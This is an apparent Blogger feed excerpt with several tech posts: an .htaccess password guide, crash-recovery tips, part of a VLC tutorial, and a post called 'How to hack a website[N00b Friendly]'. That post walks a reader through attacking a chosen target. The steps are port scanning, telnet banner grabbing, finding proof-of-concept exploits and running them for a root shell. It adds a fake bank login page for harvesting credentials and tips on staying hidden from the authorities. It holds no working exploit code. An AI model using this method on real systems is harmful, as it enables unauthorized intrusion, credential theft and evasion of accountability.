style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;For security reasons, it is best to place this file above the root of your domain ie. place it in something like /home/mysite/ instead of /home/mysite/public_html.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Create a username and password&lt;/span&gt;&lt;/strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;The username and password added to your .htpasswd file is in the format :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;username:encryptedpassword&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;So my generated password might be something like&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;Kevin:nDh54k4Nc.C5c&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;So how do I encrypt my password in this way? Well there are a number of ways but the quickest and easiest is to use one of the many encryption sites on the web. Just use any of the scripts below to generate your encrypted password.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: .0001pt; margin-bottom: 0in; margin-left: 30.0pt; margin-right: 30.0pt; margin-top: 0in; mso-list: l1 level1 lfo4; tab-stops: list .5in; text-indent: -.25in;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=&quot;font-family: Symbol; font-size: 10pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;font-family: Arial; font-size: 10pt;&quot;&gt;&lt;a href=&quot;http://www.htmlite.com/HTA006a.php&quot; target=&quot;_new&quot;&gt;htpasswd encryption&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: .0001pt; margin-bottom: 0in; margin-left: 30.0pt; margin-right: 30.0pt; margin-top: 0in; mso-list: l1 level1 lfo4; tab-stops: list .5in; text-indent: -.25in;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=&quot;font-family: Symbol; font-size: 10pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;font-family: Arial; font-size: 10pt;&quot;&gt;&lt;a href=&quot;http://home.flash.net/cgi-bin/pw.pl&quot; target=&quot;_new&quot;&gt;.htpasswd Content Generator&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Once you have your username and password, simply add the line to your .htaccess file. Now go and test it out and see if your directory is now password protected&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape  id=&quot;_x0000_i1026&quot; type=&quot;#_x0000_t75&quot; alt=&quot;:)&quot; style=&#39;width:11.25pt;height:11.25pt&#39;&gt; &lt;v:imagedata src=&quot;file:///C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\msohtml1\01\clip_image001.gif&quot;   o:href=&quot;http://www.htaccessbasics.com/wp-includes/images/smilies/icon_smile.gif&quot;/&gt;&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;img alt=&quot;:)&quot; border=&quot;0&quot; height=&quot;15&quot; src=&quot;file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/01/clip_image001.gif&quot; v:shapes=&quot;_x0000_i1026&quot; width=&quot;15&quot; /&gt;&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 11pt;&quot;&gt;Some things to note :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 6.0pt; margin-left: 30.0pt; margin-right: 30.0pt; margin-top: 0in; mso-list: l0 level1 lfo5; tab-stops: list .5in; text-indent: -.25in;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=&quot;font-family: Symbol; font-size: 10pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;font-family: Arial; font-size: 10pt;&quot;&gt;To give additional users access to a directory simply add another line with a username and encrypted password&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 6.0pt; margin-left: 30.0pt; margin-right: 30.0pt; margin-top: 0in; mso-list: l0 level1 lfo5; tab-stops: list .5in; text-indent: -.25in;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=&quot;font-family: Symbol; font-size: 10pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;font-family: Arial; font-size: 10pt;&quot;&gt;Only the password is encrypted, the username is not encryped&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #faf8f5; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial; font-size: 10.5pt;&quot;&gt;&lt;o:p&gt;~ &lt;a href=&quot;https://www.facebook.com/w4rb0y&quot; target=&quot;_blank&quot;&gt;w4r-b0y&lt;/a&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #faf8f5; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial; font-size: 10.5pt;&quot;&gt;&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #faf8f5; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial; font-size: 6.5pt;&quot;&gt;&lt;a href=&quot;http://htaccessbasics.com/&quot;&gt;Source&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/1281051983230891971/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/04/htaccess-file-explained.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/1281051983230891971'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/1281051983230891971'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/04/htaccess-file-explained.html' title='Htaccess File Explained'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-usWFOM7yinQ/T32O5EBlBDI/AAAAAAAAAFc/l21ZY-bSTmc/s72-c/htaccess+w4r-b0y.gif" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-3728754545148857626</id><published>2012-03-31T18:23:00.002+05:30</published><updated>2012-03-31T18:23:53.879+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basics"/><category scheme="http://www.blogger.com/atom/ns#" term="How to"/><category scheme="http://www.blogger.com/atom/ns#" term="Miscellaneous"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type='text'>How to safeguard your files when computer crashes</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-R53fAv9obCU/T3b9kb7MG4I/AAAAAAAAAFI/QsNUBsXcYS4/s1600/Computer+crashed+w4r-b0y.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;193&quot; src=&quot;http://4.bp.blogspot.com/-R53fAv9obCU/T3b9kb7MG4I/AAAAAAAAAFI/QsNUBsXcYS4/s320/Computer+crashed+w4r-b0y.gif&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;First thing to keep in mind: If your computer hasn&#39;t crashed yet, it will in the future! So instead of waiting for fate to strike, take some precautions now:&lt;br /&gt;&lt;br /&gt;1) BACK-UP! Buy some decent DVD-R discs and put everything useful in them. When you have more useful stuff, backup again. Do this often.&lt;br /&gt;&lt;br /&gt;2) Keep your computer healthy. Use an antivirus, an anti-spy, and a firewall. Keep them updated. Check regularly for Windows critical fixes.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;3) Don&#39;t install software that would do dangerous things to your hard drive. A boot manager would fall in this category.&lt;br /&gt;&lt;br /&gt;4) Use a registry cleaner before and after you install or uninstall any software. Many of the problems that will keep Windows from booting are caused by sloppy software that mess up your registry. A good registry cleaner is Tune-up Utilities.&lt;br /&gt;Code:&lt;br /&gt;http://www.tune-up.com/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5) Run chkdsk now and then. Go to Start&amp;gt; Run. Type chkdsk /F. Press enter.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;In case your PC has already crashed, read the following:&lt;br /&gt;&lt;br /&gt;Most important: Don&#39;t panic! Panic is like a little demon that whispers in your ear to format your hard drive and reinstall everything. Don&#39;t do it! You will lose all your data and the little demon will laugh at you.&lt;br /&gt;&lt;br /&gt;To be exact you can still recover your data if you format your drive (by using special software), but only if you don&#39;t write anything on the disc afterwards. In other words format + windows install = bad idea. If you reinstall windows without formating your drive, you will only lose the files on your desktop and &quot;My Documents&quot; folder.&lt;br /&gt;&lt;br /&gt;In all occasions you should make sure to safeguard your files before attempting any kind of repair!&lt;br /&gt;&lt;br /&gt;So let&#39;s go about how to do that:&lt;br /&gt;&lt;br /&gt;The fast way: Go to this site:&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.knoppix.org/&quot;&gt;http://www.knoppix.org&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Knoppix is a Linux distribution than runs from a CD. Download the Knoppix ISO and burn it. Put it in your CD drive. On startup access BIOS and change the boot sequence so that your computer boots from the CD drive. Save settings and exit. Upon reboot, Knoppix will load.&lt;br /&gt;&lt;br /&gt;Knoppix is much like windows and it comes with its own CD burner. Locate it, launch it and backup everything you want on CD. Now you don&#39;t have to worry anymore!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The less fast way: This requires that you have access to a second PC. Open the case of your computer and remove the hard disk.&lt;br /&gt;&lt;br /&gt;Install it as a slave on the second PC.&lt;br /&gt;&lt;br /&gt;Depending on respective configurations, you may have to change some jumper settings on the drive. Read the manual for help with installing hard drives and setting jumpers.&lt;br /&gt;&lt;br /&gt;After this is done, boot the second PC. If everything went out ok, you should be able to access your drive without problems. (Edit: Note that Win98 cannot recognize a local NTFS (Win2K/XP) disk.)&lt;br /&gt;&lt;br /&gt;Copy everything you need from your own hard drive to the other one. Now you don&#39;t have to worry anymore!&lt;br /&gt;&lt;br /&gt;Replace your computer&#39;s hard disk, fix all problems and reverse the process to copy the data back to your computer, or take CD backups on the other PC. :)&lt;br /&gt;&lt;br /&gt;Enjoy..!! :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;w4r-b0y&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/3728754545148857626/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-safeguard-your-files-when.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/3728754545148857626'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/3728754545148857626'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-safeguard-your-files-when.html' title='How to safeguard your files when computer crashes'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-R53fAv9obCU/T3b9kb7MG4I/AAAAAAAAAFI/QsNUBsXcYS4/s72-c/Computer+crashed+w4r-b0y.gif" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-2729319255324723188</id><published>2012-03-20T16:07:00.001+05:30</published><updated>2012-03-20T16:07:16.740+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basics"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="IP Address"/><category scheme="http://www.blogger.com/atom/ns#" term="Metasploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>How to hack a website[N00b Friendly]</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-5cJV11vv3ag/T2hdpbeNQJI/AAAAAAAAAFA/Z5slsRkC290/s1600/coding.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://1.bp.blogspot.com/-5cJV11vv3ag/T2hdpbeNQJI/AAAAAAAAAFA/Z5slsRkC290/s320/coding.jpg&quot; width=&quot;236&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;So say somehow somewhere we ended up choosing a target to start wreaking havoc upon. All we need is an IP Address. Theres plenty of papers out there that go into how to obtain an IP Address from the preferred mark of your choice. So I&#39;m not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to &quot;hack&quot; the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.&lt;br /&gt;&lt;br /&gt;Example 1:&lt;br /&gt;Idlescan using Zombie &amp;lt;Domain Name&amp;gt; (192.150.13.111:80); Class: Incremental&lt;br /&gt;Interesting ports on 208.225.90.120:&lt;br /&gt;(The 65522 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;21/tcp open ftp&lt;br /&gt;25/tcp open smtp&lt;br /&gt;80/tcp open http&lt;br /&gt;111/tcp open sunrpc&lt;br /&gt;135/tcp open loc-srv&lt;br /&gt;443/tcp open https 1027/tcp open IIS&lt;br /&gt;1030/tcp open iad1&lt;br /&gt;2306/tcp open unknown&lt;br /&gt;5631/tcp open pcanywheredata&lt;br /&gt;7937/tcp open unknown&lt;br /&gt;7938/tcp open unknown&lt;br /&gt;36890/tcp open unknown&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we dont even know what type of software or what operating system that this system is running.&lt;br /&gt;&lt;br /&gt;2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.&lt;br /&gt;&lt;br /&gt;So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.&lt;br /&gt;So say we typed &#39;TELNET -o xxx.xxx.xxx.xxx 25&#39; This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now this is a very important part in the enumeration process. You notice it says &#39;Sendmail 8.12.8/8.12.8&#39; Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.exploit-db.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.&lt;br /&gt;&lt;br /&gt;At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I dont recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.&lt;br /&gt;&lt;br /&gt;There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the slave will enter http://www.bank.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.bank.com. You need to have a small script set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the slave doenst give it a second thought and will simply try again later.&lt;br /&gt;&lt;br /&gt;_________________________________________________________________________&lt;br /&gt;&lt;br /&gt;So as a summary of how to 0wn a box when you only have an IP Address&lt;br /&gt;Method Works On BOTH Linux and Windows.&lt;br /&gt;&lt;br /&gt;****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****&lt;br /&gt;&lt;br /&gt;- Port Scan The Address And Record Open Ports&lt;br /&gt;- Telnet To Open Ports To Identify Software Running On Ports&lt;br /&gt;&lt;br /&gt;3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports&lt;br /&gt;&lt;br /&gt;- Record Banners And Take Note Of The Application Running and The Version Number&lt;br /&gt;- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google.&lt;br /&gt;- Make a copy of some Proof-Of-Concept code for the vulnerability.&lt;br /&gt;&lt;br /&gt;*Read the documentation if there is any, for the proof-of-concept code you will be using for your exploit*&lt;br /&gt;&lt;br /&gt;- Run The Exploit Against The slave.&lt;br /&gt;- Reap The Cheap-Sh0t Ownage&lt;br /&gt;&lt;br /&gt;__________________________________________________ _______________&lt;br /&gt;**This document does not go into covering your tracks. If you dare try any of this stuff on a box you dont have consent to hack on, They will simply look at the logs and see your IP Address and then go straight to your ISP. Once you get more 1337 you get to learn how to get away with the nasty deeds. This is what the majority of kode-kiddies do when they perform attacks. The key is to enumerate all the info you can from the machine, the more info you have on the system the better. User accounts can also be enumerated. Once you have a list of account names, you may then proceed to brute-force or perform a cryptanalysis attack to gain control of the account. Then you must work on privilage escalation. Users are not Admins/Root**&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;Thanx to&amp;nbsp;Skittles- for this lovely tutorial. :)&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/2729319255324723188/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-hack-websiten00b-friendly.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/2729319255324723188'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/2729319255324723188'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-hack-websiten00b-friendly.html' title='How to hack a website[N00b Friendly]'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-5cJV11vv3ag/T2hdpbeNQJI/AAAAAAAAAFA/Z5slsRkC290/s72-c/coding.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-7857241668792285298</id><published>2012-03-19T13:37:00.000+05:30</published><updated>2012-03-19T13:37:12.211+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="How to"/><category scheme="http://www.blogger.com/atom/ns#" term="Miscellaneous"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="VLC media Player"/><title type='text'>How to edit meta tags of Media files using VLC Player</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;How to edit meta tags of audio and video files using VLC Player.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://images1.videolan.org/images/largeVLC.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://images1.videolan.org/images/largeVLC.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;What are meta tags..??&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;In simple words, Audio and Video files contains some information about Title, Artist, Album, Genre, Date, Publisher, and more..&lt;br /&gt;&lt;br /&gt;There are many meta tag editor available. But here is the way to edit them with VLC media player which is very popular media player at this time.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;VLC media Player&lt;/b&gt; can be used to edit meta tags of both audio files as well as video files. :)&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;So, here is the way, just follow these simple steps:-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1) &lt;/b&gt;Open the media file in VLC Media Player and Click on 